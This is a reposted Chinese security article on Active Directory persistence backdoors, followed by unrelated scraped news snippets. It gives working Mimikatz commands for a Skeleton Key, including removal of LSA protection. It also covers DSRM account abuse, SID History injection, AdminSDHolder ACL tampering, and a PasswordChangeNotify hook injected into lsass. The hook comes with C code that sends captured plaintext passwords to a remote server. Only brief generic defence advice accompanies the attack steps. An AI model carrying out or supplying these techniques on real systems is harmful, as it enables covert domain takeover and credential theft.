范文健康探索娱乐情感热点
投稿投诉
热点动态
科技财经
情感日志
励志美文
娱乐时尚
游戏搞笑
探索旅游
历史星座
健康养生
美丽育儿
范文作文
教案论文

常见域后门技术总结与分析利用以及防范措施

  0x00 前言
  当获取到域控的权限后,为了防止对域控权限的丢失,hacker 也会使用一些技术来维持已获取到的域权限。因此,本文对常见的域后门技术进行了总结并对其利用方式进行了详细的说明,希望可以对大家的学习提供一些帮助。 0x01 创建 Skeleton Key 域后门
  Skeleton Key 即 "万能钥匙"。通过在域控上安装 Skeleton Key,所有域用户账户都可以使用一个相同的密码进行认证,同时原有密码仍然有效。
  该技术通过注入 lsass.exe 进程实现,并且创建的 Skeleton Key 只是保存在内存中,域控只要重启,Skeleton Key 就会失效。
  注意:利用该技术需要拥有域管理员的权限 1. 常规利用
  将 Mimikatz 上传到域控制器,执行以下命令: mimikatz.exe "privilege::debug" "misc::skeleton" exit
  执行后,将成功创建 Skeleton Key 域后门,为所有的域账户设置一个相同的密码 "mimikatz",从而使其他机器可以成功登录域控。
  2. 缓解措施
  微软在 2014 年 3 月添加了 LSA(Local Security Authority,本地安全机构)保护策略,用来防止对 lsass.exe 进程的内存读取和代码注入。通过执行以下命令,可以开启或关闭 LSA 保护。 # 开启 LSA 保护策略 reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa" /v RunAsPPL /t REG_DWORD /d 1 /f # 关闭 LSA 保护策略 reg delete "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa" /v RunAsPPL
  开启LSA 保护策略并重启系统后,Mimikatz 的相关操作都会失败。此时即使已经获取了 Debug 权限也无法读取用户哈希值,更无法安装 Skeleton Key。
  不过,Mimikatz 可以绕过 LSA 保护。该功能需要 Minikatz 项目中的 mimidrv.sys 驱动文件,相应的 Skeleton Key 安装命令也变为了如下: mimikatz # privilege::debug mimikatz # !+ mimikatz # !processprotect /process:lsass.exe /remove mimikatz # misc::skeleton
  0x02 创建 DSRM 域后门
  DSRM(Directory Services Restore Mode,目录服务还原模式)是域控的安全模式启动选项,用于使服务器脱机,以进行紧急维护。在初期安装 Windows 域服务时,安装向导会提示用户设置 DSRM 的管理员密码。有了该密码后,网络管理员可以在后期域控发生问题时修复、还原或重建活动目录数据库。
  在域控上,DSRM 账户实际上就是本地管理员账户(Administrator),并且该账户的密码在创建后几乎很少使用。通过在域控上运行 NTDSUtil,可以为 DSRM 账户修改密码,相关命令如下: # 进入 ntdsutil ntdsutil # 进入设置 DSRM 账户密码设置模式 set dsrm password # 在当前域控上恢复 DSRM 密码 reset password on server null # 输入新密码 123456Lhz!   # 再次输入新密码  # 退出 DSRM 密码设置模式 q # 退出 ntdsutil q
  hacker 可以通过修改 DSRM 账户的密码,以维持对域控的权限。
  该技术适用于 Windows Server 2008 及以后版本的服务器,并需要拥有域管理员的权限
  利用过程:
  ① 执行以下命令,通过 Mimikatz 读取域控的 SAM 文件,获取 DSRM 账户的哈希值。 mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" exit
  ② 修改 DSRM 账户的登录模式,以允许该账户远程登录。可以通过编辑注册表的DsrmAdminLogonBehavior 键值来实现,可选用的登录模式有以下3种: 0:默认值,只有当域控制器重启并进入 DSRM 模式时,才可以使用 DSRM 管理员账号。
  1:只有当本地 AD DS 服务停止时,才可以使用 DSRM 管理员账号登录域控制器。
  2:在任何情况下,都可以使用 DSRM 管理员账号登录域控制器。
  执行以下命令,将 DSRM 的登录模式改为 "2",允许 DSRM 账户在任何情况下都可以登录域控。 reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa" /v DsrmAdminLogonBehavior /t REG_DWORD /d 2 /f
  ③ 这时,hacker 就可以通过 DSRM 账户对域控制器进行控制了。
  执行以下命令,使用 DSRM 账户对域控执行哈希传递攻击并成功获取域控权限:
  0x03 SID History 的利用1. SID & SID History
  在 Windows 系统中,SID(Security Identifiers)是指安全标识符,是用户、用户组或其他安全主体的唯一、不可变标识符。
  Windows 根据 ACL(访问控制列表)授予或拒绝对资源的访问和特权,ACL 使用 SID 来唯一标识用户及其组成员身份。当用户登录到计算机时,会生成一个访问令牌,其中包含用户和组 SID 和用户权限级别。当用户请求访问资源时,将根据 ACL 检查访问令牌以允许或拒绝对特定对象的特定操作。
  如果将账户删除,然后使用相同的名字创建另一个账户,那么新账户不会具有前一个账户的特权或访问权限,这是因为两个账户的 SID 不同。
  SID History 是一个支持域迁移方案的属性,使得一个账户的访问权限可以有效地克隆到另一个账户,这在域迁移过程中非常有用。例如,当 Domain A 中的用户迁移到 Domain B 时,会在 Domain B 中新创建一个账号。此时,将 Domain A 用户的 SID 添加到 Domain B 的用户账户的 SID History 属性中。这就确保了 Domain B 用户仍然拥有访问 Domain A 中资源的权限。 2. 利用方法
  在实战中,hacker 可以将域管理员用户的 SID 添加到其他域用户的 SID History 属性中,以此建立一个隐蔽的域后门。
  利用该技术需要拥有域管理员权限
  下面在域控制器( Win 2012 )上进行实操:
  在 Windows Server 2019 上进行测试时可能会报错
  ① 创建域用户 Alice
  ② 向域控制器上传 Mimikatz,并执行以下命令,将域管理员 Administrator 的 SID 添加到域用户 Alice 的 SID History 属性中: # mimikatz版本大于2.1.0 mimikatz.exe "privilege::debug" "sid::patch" "sid::add /sam:Alice /new:Administrator" exit # mimikatz版本小于2.1.0 mimikatz.exe "privilege::debug" "misc::addsid Alice ADSAdministrator" exit
  ③ 通过 Powershell 查看 Alice 用户的属性,可以发现其 SID History 属性值已经与 Administrator 用户的 SID 相同,这说明 Alice 用户将继承 Administrator 用户的所有权限。 Import-Module ActiveDirectory Get-ADUser hack -Properties SIDHistory
  ④ 通过 Alice 用户连接域控,执行 "whoami /priv" 命令,可以看到该用户拥有域管理员的所有特权。
  0x04 利用 AdminSDHolder 打造域后门1. AdminSDHolder
  AdminSDHolder 是一个特殊的 Active Directory 容器对象,位于 Domain NC 的 System 容器下。
  AdminSDHolder 通常作为系统中某些受保护对象的安全模板,以防止这些对象遭受恶意修改或滥用。
  受保护对象通常包括系统的特权用户和重要的组,如 Administrator、Domain Admins、Enterprise Admins 以及 Schema Admins 等。
  在活动目录中,属性 adminCount 用来标记特权用户和组。对于特权用户和组来说,该属性值被设为 1。
  通过 ADFind 查询 adminCount 属性设置为 1 的对象,可以找到所有受 AdminSDHolder 保护的特权用户和组。 # 枚举受保护的用户 Adfind.exe -b "dc=hack-my,dc=com" -f "&(objectcategory=person)(samaccountname=*)(admincount=1)" -dn # 枚举受保护的组 Adfind.exe -b "dc=hack-my,dc=com" -f "&(objectcategory=group)(admincount=1)" -dn
  在默认情况下,系统将定期(每60分钟)检查受保护对象的安全描述符,将受保护对象的 ACL 与 AdminSDHolder 容器的 ACL 进行比较,如果二者不一致,系统就会将受保护对象的 ACL 强制修改为 AdminSDHolder 容器的 ACL。该工作通过 SDProp 进程来完成,该进程以 60 分钟为一个工作周期。 2. 利用方法
  在实战中,hacker 可以篡改 AdminSDHolder 容器的 ACL 配置。当系统调用 SDProp 进程执行相关工作时,被篡改的 ACL 配置将同步到受保护的 ACL 中,以此建立一个隐蔽的域后门。
  利用该技术需要拥有域管理员权限
  执行以下命令,通过 PowerView 向 AdminSDHolder 容器对象添加一个 ACL,使普通域用户 Alice 拥有对 AdminSDHolder 的 "完全控制" 权限。 Import-Module .PowerView.ps1 Add-DomainObjectAcl -TargetSearchBase "LDAP://CN=AdminSDHolder,CN=System,DC=hack-my,DC=com" -PrincipalIdentity Alice -Rights All -Verbose
  执行后,Alice 用户成功拥有 AdminSDHolder 容器对象的完全控制权限
  等待 60 分钟后,Alice 用户将获得对系统中的特权用户和组完全控制权限。
  此时,Alice 用户可成功向 Domain Admins 等关键用户组内添加成员。
  如果清除 Alice 用户对 AdminSDHolder 的完全控制权限,可以执行以下命令: Remove-DomainObjectAcl -TargetSearchBase "LDAP://CN=AdminSDHolder,CN=System,DC=hack-my,DC=com" -PrincipalIdentity Alice -Rights All -Verbose
  3. 改变 SDProp 的工作周期
  方法1:修改注册表
  hacker 也可以通过注册表手动修改 SDProp 进程的工作周期,以缩短等待的时长(最小值1分钟,最大值2小时)。该注册表需要慎重修改, 当修改的频率变高时,CPU处理LSASS的开销也就越大,这很容易导致系统变得卡顿,该注册表键默认是不存在的。 # 工作周期修改为 1 分钟,键值以秒为单位 reg add HKLMSYSTEMCurrentControlSetServicesNTDSParameters /v AdminSDProtectFrequency /t REG_DWORD /d 60
  方法2:强制 SDProp 执行
  ① 运行 Ldp.exe(C:WindowsSystem32Ldp.exe)
  ② 点击连接 -> 连接,输入当前机器的机器名或IP,端口默认为 389
  ③ 点击连接 -> 绑定,选择绑定为当前登录的用户
  ④ 在修改窗口这里针对不同版本的域控制器有不同的情况:
  当域控为Windows Server 2008时,点击浏览 -> 修改,在属性选项卡中输入 FixUpInheritance ,在值字段输入 yes。操作选择添加,然后点击输入,最后运行即可。
  当域控为Windows Server 2008 R2或Windows Server 2012及以上时,点击浏览 -> 修改,在属性选项卡中输入 RunProtectAdminGroupsTask ,在值字段输入 1。操作选择添加,然后点击输入,最后运行即可。
  0x05 HOOK PasswordChangeNotify
  PasswordChangeNotify 在微软官方文档中的名称为 PsamPasswordNotificationRoutine,是一个 Windows API。当用户重置密码时,Windows 会先检查新密码是否符合复杂性要求,如果密码符合要求,LSA 会调用 PasswordChangeNotify 函数在系统中同步密码。该函数的语法如下: PSAM_PASSWORD_NOTIFICATION_ROUTINE PsamPasswordNotificationRoutine; NTSTATUS PsamPasswordNotificationRoutine(   [in] PUNICODE_STRING UserName,   [in] ULONG RelativeId,   [in] PUNICODE_STRING NewPassword ) {...}
  当调用 PasswordChangeNotify 时,用户名和密码将以明文的形式传入。hacker 可以通过 Hook 技术,劫持 PasswordChangeNotify 函数的执行流程,从而获取传入的明文密码。
  下面进行演示:
  ① 生成 DLL 文件,需在项目属性中将MFC的使用设为 "在静态库中使用MFC"
  ② 将编译好的 HookPasswordChange.dll 和 Invoke-ReflectivePEInjection.ps1 上传到域控制器,并通过 Invoke-ReflectivePEInjection.ps1 将 HookPasswordChange.dll 注入 lsass.exe 进程。 # 导入 Invoke-ReflectivePEInjection.ps1 Import-Module .Invoke-ReflectivePEInjection.ps1 # 读取 HookPasswordChange.dll 并将其注入 lsass 进程 $PEBytes = [IO.File]::ReadAllBytes("C:HookPasswordChange.dll") Invoke-ReflectivePEInjection -PEBytes $PEBytes -ProcName lsass
  建议在 Windows Server 2012 上进行测试,Window Server 2019 亲测运行脚本会报错
  ③ 当管理员修改密码时,用户的新密码将记录在 c:windows	emp 目录的 password.txt 文件中。
  此外,password.txt 文件的保存路径可以自定义,需要在 HookPasswordChange.cpp 文件中修改
  我们还可以在源码的基础上通过 WinINet API 添加一个简单的 HTTP 请求功能,将获取到的用户密码传回远程服务器,相关代码如下: // 需要包含 --> #incloud  HINTERNET hInternet = InternetOpen(L"Mozilla/5.0 (Windows NT 10.0; Win64; x64)",             INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0); if (hInternet == NULL) {     InternetCloseHandle(hInternet); } HINTERNET hSession = InternetConnect(hInternet, L"192.168.220.132", 6666, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);  if (hSession == NULL) {     InternetCloseHandle(hSession);     InternetCloseHandle(hInternet); }  char strUserName[128]; char strPassword[128]; WideCharToMultiByte(CP_ACP, 0, userName, -1, strUserName, sizeof(strUserName), NULL, NULL); WideCharToMultiByte(CP_ACP, 0, password, -1, strPassword, sizeof(strPassword), NULL, NULL); char Credential[128]; snprintf(Credential, sizeof(Credential), "username=%s&password=%s", strUserName, strPassword); HINTERNET hRequest = HttpOpenRequest(hSession, L"POST", L"/", NULL, NULL, NULL, 0, 0); TCHAR ContentType[] = L"Content-Type: application/x-www-form-urlencoded"; HttpAddRequestHeaders(hRequest, ContentType, -1, HTTP_ADDREQ_FLAG_ADD | HTTP_ADDREQ_FLAG_REPLACE); HttpSendRequest(hRequest, NULL, 0, Credential, strlen(Credential));
  重新编译生成 HookPasswordChange.dll 并注入 lsass.exe 进程,当管理员修改密码时,将通过 HTTP POST 方法将用户密码外带到远程服务器。
  加入HTTP 请求功能后重新编译时,如果出现报错:无法解析的外部符合 _imp_XXXXX,可以参考:解决方案 0x06 总结
  防范域后门的建议:更新安全补丁:安装并更新所有操作系统和应用程序的最新安全补丁可以修复已知漏洞,并减少系统受到攻击的风险。限制管理员访问:管理员账户应该仅限于必要的操作,并且应该使用最小化特权的账户。管理员账户的密码应该足够强大,并且需要定期更换。强化密码策略:强制使用复杂的密码,并限制登录尝试次数,以防止恶意攻击者使用暴力破解密码的方式获取访问权限。实施网络隔离:将不同的网络隔离起来,可以减少攻击者在一次攻击中访问整个网络的可能性。网络隔离也可以限制内部用户对受感染系统的访问。部署安全软件:使用杀毒软件、防火墙和入侵检测系统等安全软件可以帮助检测和阻止潜在的攻击。定期备份数据:备份数据可以确保在遭受攻击时能够快速恢复系统和数据。备份数据应存储在离线介质上,并且需要定期测试以确保可靠性。培训用户:向用户提供安全意识培训,教育他们如何避免受到钓鱼攻击和恶意软件的影响,可以减少系统受到攻击的风险。
  from https://www.freebuf.com/articles/network/359329.html

绝望的文盲图1侵删穿过屏幕,穿越进入一个自己手持网络终端所眼见的网络虚幻世界之中,一切的发生都与己无关,包括自己在内的一切都只是网络机器,都是虚妄飘渺的,虽然偶尔会随着网络信息的气氛,如脉冲洪晓兰丨止语禅修班开示有感今天看到你们来到这里一起禅修,我想我们大家都是有缘之人,既然是缘,我们就要珍惜这样的一个缘分。世界上有50多亿人,大家能碰在一起,同吃同住同修,这是一个非常难得机会。画苏洪晓兰艺术京东方不太可能取代三星成为iPhone16的顶级屏幕供应商IT之家2月14日消息,天风证券分析师郭明錤在今年1月初发布预测京东方在即将到来的iPhone15和iPhone15Pro的订单上将击败三星。到2024年,京东方将开始为iPhon海外市场的危险信号三星苹果在增长,国产手机在收缩文王新喜2022年,对于国产手机而言,是不友好的一年,国内外的表现都不好。在2022年在全球智能手机销量下降11。3的大背景下,全球前五的手机厂商销量都在下降,但如果我们综合IDC苹果CarPlay认证之ITU测试简介MFi是英文MadeforiPhoneiPodiPad的缩写,是苹果公司对其授权配件厂商生产的外置配件的一种标识使用许可,即指连接苹果的iPhoneiPodiPad的电子配件,如数E分析华为三星小米的这些折叠屏手机,我们都拆了22年末,我们拆解了3款折叠屏手机,分别是HUAWEIP50PocketSAMSUNGGalaxyZFlip4XiaomiMIXFold2。这3款折叠屏手机算是较为热门的折叠屏产品ChatGPT问答测试(第一期)2023年2月14日2023年2月14日Q玛雅预言,2012年地球毁灭,为什么没有实现?A玛雅预言并不说地球会在2012年毁灭,而是有关于2012年会发生一个重要的历史转折点,但是具体会发生什么并不明三星推出OdysseyOLEDG8G7NeoG7三款游戏显示器IT之家2月14日消息,三星今天发布新闻稿,正式推出OdysseyOLEDG8OdysseyG7和OdysseyG7Neo三款下一代游戏显示器。这三款显示器支持NeoQuantum三星GalaxyS23在韩预售量创S系列机型之最韩联社消息,三星电子2月14日表示,近一周来新旗舰手机GalaxyS23系列在韩国国内的预售量为109万部,创GalaxyS系列预售量之最。7日凌晨,三星启动GalaxyS23预售郭明錤安卓正面临高库存风险三星至6月库存才能正常手机中国新闻近几年来,由于多种因素的影响,手机销量逐年下滑,甚至导致不少手机厂商出现严重库存堆积的情况。即便是三星这种在全球市场有着极高市场份额的手机厂商,也无法逃脱库存堆积的窘境大部分人都不用华为,为什么用三星?难怪三星销量第一!最近和朋友们聊起今年要换什么手机?我发现大家对三星手机特别青睐!大部分用的都是三星手机。有一小部分用的苹果或者其他品牌,但是就是没有用华为手机的。朋友们的收入都是我的好几倍,平均超
中国女篮迎大考6天5战冲4强广州日报全媒体记者黄维明天,2022年国际篮联女篮世界杯将在澳大利亚悉尼燃起战火,中国女篮将从小组赛首战对阵韩国队的比赛开启世界杯之旅。在近3个月的备战之后,这支球队将面临大考,中详尽解读,中国女篮12朵金花特点,3大新星有望完美绽放文水清清明天,女篮世界杯将拉开战幕,为了让球迷更好地观赏比赛,今天,我们将12朵金花的个人特点分享给球迷,而为了让球迷熟知女篮阵容,我们以五个位置进行解读。中国女篮合照一控卫王思雨下赛季恐剑走偏锋的五大球星,普尔为梦奔走,希罗殊死一搏不破不立,这句极赋哲理的成语同适用于NBA的舞台。在巨星扎堆的商业联盟时代,两巨头三巨头球队已成为大势所趋,但,并非最好的就是最适合的。与其彼此折磨,互相消耗,不如独辟蹊径,殊死一喜迎二十大红网时刻通讯员李栋梁军报道湘江北去,潮涌湘阴。远大可建生产基地里,芯板活楼生产线机器轰鸣,奏响湘阴县产业转型升级的动律节奏新兴项目相继签约,专精特新企业加速培育,欣欣向荣的市场经济省会经济圈,双向加速作者浪子来源趵突视角微信公众号(IDbaotushijiao)8月8日,德州市新型城镇化规划(20212035年)发布。敏感的媒体马上注意到,该规划明确提出要实质性推进济德一体化发加强在华合作宝马集团与华晨宝马合同有效期延长至2040年2022年2月11日起,宝马与其合资企业华晨宝马汽车有限公司(以下简称华晨宝马)的合同有效期将延长至2040年。早在2018年10月,华晨宝马成立15周年之际,双方就已经签署了合同张海霞不疯魔勿创业!(转载)张海霞不疯魔勿创业!(转载)20229210804个人分类杂文评论系统分类观点评述httpsblog。sciencenet。cnblog2991356210。html最近接触很多创四大旗舰投票开始,下月还有哪些新机发布最近一段时间,不少品牌都带来了旗下的全新旗舰产品。而随着新一代苹果iPhone14系列和华为Mate50系列的正式到来,今年的旗舰市场也开始了更激烈的竞争。同时,科技美学四大旗舰投iPhone14Pro与小米12SPro详细对比优缺点一目了然iPhone14系列破发了!目前已经全面开售。iPhone14Pro是第一款配备灵动岛功能的iPhone。但是,如果我们将它与上一代产品进行比较,这种美观的新功能并不是该设备的唯一华为Mate50系列5G手机壳曝光,后续还有多款旗舰新机待发布一段时间以来,华为什么时候会再次带来旗下的5G设备这一消息备受关注。华为轮值董事长徐直军在此前的采访中曾表示,希望大家能等几年,看看我们能不能努力达到这个目标,让大家能继续买到华为云顶之弈12。18版本更新解读,星界龙大改,金鳞极大增强兄弟们好,我是摩昂解说!12。18版本就要来临,这次改动相对来说比较大,增强了多枚冷门棋子,而星界重做,金鳞装备又大增强,对版本环境影响也会比较大。下面摩昂就把这版本的改动与大家一